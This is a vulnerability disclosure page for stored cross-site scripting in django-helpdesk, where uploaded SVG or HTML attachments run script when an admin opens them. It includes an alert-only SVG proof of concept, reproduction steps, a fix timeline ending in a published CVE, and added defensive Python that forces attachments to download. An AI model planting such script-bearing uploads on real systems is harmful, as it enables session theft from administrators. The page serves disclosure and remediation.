Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

Valid

Reported on Nov 11th 2021


Description

Stored XSS via uploading an attachment in .svg or .html format

Detail

When an attachment is opened, files of certain formats (such as .svg and .html) are rendered by the browser instead of being downloaded, so any JavaScript previously injected into the attachment executes in the context of the application.
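The rendering described above is what the server has to prevent. The following is an added example, not code from django-helpdesk or from the reporter, and it does not claim to reproduce the project's own fix: a framework-agnostic Python helper that chooses the response headers for serving an uploaded attachment so that it is always downloaded, never rendered inline, and so that HTML/SVG content is never sent with a type the browser would execute. Wiring these headers into a Django HttpResponse is assumed and not shown; the active-content type list and the byte markers are assumptions for the example.

```python
"""Defensive header selection for serving user-uploaded attachments.

Added example (not django-helpdesk code). Returns a plain dict of headers so
it can be used from any web framework; the Django response wiring is assumed.
"""
import mimetypes
import posixpath
import re

# MIME types a browser treats as active documents when rendered inline.
# Assumed list for this example; extend as needed.
ACTIVE_CONTENT_TYPES = {
    "text/html",
    "application/xhtml+xml",
    "image/svg+xml",
    "text/xml",
    "application/xml",
    "text/javascript",
    "application/javascript",
    "application/x-javascript",
}

# Leading bytes that mark a file as HTML/SVG/script even when the extension
# says otherwise (e.g. "logo.png" that actually contains an SVG document).
_ACTIVE_MARKERS = re.compile(
    rb"<\s*(script|svg|html|!doctype\s+html|iframe|object|embed)\b", re.IGNORECASE
)


def safe_filename(name: str) -> str:
    """Strip path components and characters that could break the header value."""
    base = posixpath.basename(name.replace("\\", "/"))
    base = re.sub(r'[\r\n";]', "_", base).strip() or "attachment"
    return base


def looks_like_active_content(head: bytes) -> bool:
    """Return True if the first bytes of an upload look like HTML, SVG or script."""
    return _ACTIVE_MARKERS.search(head[:1024]) is not None


def attachment_response_headers(filename: str, head: bytes = b"") -> dict:
    """Headers for serving an attachment so it is downloaded, never rendered.

    - Content-Disposition: attachment forces a download instead of inline rendering.
    - X-Content-Type-Options: nosniff stops the browser second-guessing the type.
    - Active content types (or files whose bytes sniff as active content) are sent
      as application/octet-stream so even an inline view cannot execute them.
    - Content-Security-Policy: sandbox blocks script execution as a last line of
      defence should the document still be rendered.
    """
    name = safe_filename(filename)
    guessed, _ = mimetypes.guess_type(name)
    content_type = guessed or "application/octet-stream"
    if content_type in ACTIVE_CONTENT_TYPES or looks_like_active_content(head):
        content_type = "application/octet-stream"
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


if __name__ == "__main__":
    # Constructed samples: an SVG carrying a script, an HTML file, a real PNG,
    # and a PNG-named upload that actually contains the SVG.
    svg_with_script = (
        b'<?xml version="1.0" standalone="no"?>\n'
        b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert("XSS");</script></svg>'
    )
    samples = [
        ("PoC.svg", svg_with_script),
        ("notes.html", b"<!DOCTYPE html><p>hello</p>"),
        ("photo.png", b"\x89PNG\r\n\x1a\n"),
        ("../../etc/passwd.png", svg_with_script),
    ]
    for fname, head in samples:
        print(fname, "->", attachment_response_headers(fname, head))
```

The byte sniff matters because the extension check alone is bypassed by renaming the file; with the headers above the worst case for a mis-typed upload is a download of an opaque binary blob.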

Proof of Concept

// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Steps to Reproduce

Create a ticket as an unauthenticated user

Upload a .svg or .html file as an attachment

The XSS triggers when the admin opens the attachment

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the django-helpdesk team within 24 hours. 23 days ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 22 days ago
Garret Wassermann validated this vulnerability 22 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a 16 days ago

lethanhphuc (Researcher), 16 days ago:

PR: https://github.com/django-helpdesk/django-helpdesk/pull/984

Garret Wassermann confirmed that a fix has been merged on 04483b 16 days ago
lethanhphuc has been awarded the fix bounty
Jamie Slome (Admin), 15 days ago:

CVE published! 🎊